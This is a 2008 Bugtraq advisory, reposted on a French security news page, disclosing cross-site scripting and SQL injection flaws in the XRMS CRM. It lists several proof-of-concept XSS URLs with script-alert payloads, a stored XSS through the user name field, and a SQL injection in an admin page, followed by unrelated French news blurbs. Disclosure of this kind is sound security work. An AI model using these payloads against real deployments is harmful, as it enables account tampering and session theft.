Publié le 04-09-2008 18:09 sur la mailing-list Bugtraq

Pub : CA Anti-Spyware 2007 - Les logiciels espions sont notre cible avant que vous ne deveniez la leur!

Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities
in XRMS, CVE-2008-3664=20

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2008-3664
http://nvd.nist.gov/nvd.cfm?cvename=3DCVE-2008-3664
http://xrms.sourceforge.net

Description

XRMS is a web-based application for managing business entities such as
employees, customers, contacts, activities with those contacts, etc.
The application is vulnerable to simple Cross Site Scripting, which can
be used for several isues=20

Example

Assuming XRMS is installed on http://localhost/xrms/, anybody could
inject JavaScript with:
http://localhost/xrms/login.php?target=3D"><script>alert(1);</script>
http://localhost/xrms/activities/some.php?title=3D"><script>alert(1);</scri=
pt>
http://localhost/xrms/companies/some.php?company_name=3D"><script>alert(1);=
</script>
http://localhost/xrms/contacts/some.php?last_name=3D"><script>alert(1);</sc=
ript>
http://localhost/xrms/campaigns/some.php?campaign_title=3D"><script>alert(1=
);</script>
http://localhost/xrms/opportunities/some.php?opportunity_title=3D"><script>=
alert(1);</script>
http://localhost/xrms/cases/some.php?case_title=3D"><script>alert(1);</scri=
pt>
http://localhost/xrms/files/some.php?file_id=3D"><script>alert(1);</script>
http://localhost/xrms/reports/custom/mileage.php?starting=3D"><script>alert=
(1);</script>
...
A user could change their real name to <script>alert(1)</script>; will
be executed when the administrator looks at user list
A user could edit name/email of any user using SQL injection
vulnerbility in admin/users/self-2.php

Disclosure Timeline

2008-08-07 Vendor contacted
2008-09-04 Advisory published

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-XXXX to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.=20

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with
help from Hanno Boeck).=20
This vulnerability relate to CVE-2008-1129
It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de

--=20
_GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85
_chaos events near stuttgart_ www.datensalat.eu

États généraux : les masques tombent

Le syndicat national des journalistes communique : Les patrons de presse piaffent de plus en plus devant la cheminée où ils ont déposé leurs gros sabots.

Wizzgo vs NouvelObs : Deux poids deux mesures

L´application stricte de la loi DADVSI à l´encontre de Wizzgo. Le Nouvel Observateur va t il être aussi condamné à 480.000 euros d'amende ?

Alliance du mouvement de la jeunesse sur Internet

Les réseaux internet dédiés aux adolescents vont être utilisés pour combattre le crime et le terrorisme.

Jugement de plusieurs pirates de cartes bancaires

Deux anciens légionnaires, des chomeurs, un étudiant, un électricien et un agronome jugés dans une vaste fraude à la carte bancaire dans le sud de la France.

Trois nouvelles taxes pour l'Internet Français

Afin de trouver l´argent qui est censé faire survivre la télévision publique française, trois nouvelles taxes risquent d´arriver sur l'Internet hexagonal.

Clés USB: le Père-Noël est une ordure ?

Méfiez-vous des clés USB que vous allez acquérir pour Noël. Même le Pentagone Américain conseille de ne pas introduire ce genre de matériel dans son ordinateur.

Riposte graduée : Albanel délire

Comment rire avec Christine Albanel ? En l'écoutant expliquer que le retrait de l´amendement 138 était une - très bonne nouvelle -.

Un microcontrôleur pour cartes d´identité sécurisées

Le ST23YR80, un microcontrôleur équipé d'une technologies de cryptographie et d´une capacité de mémoire accrue pour le stockage des données biométriques.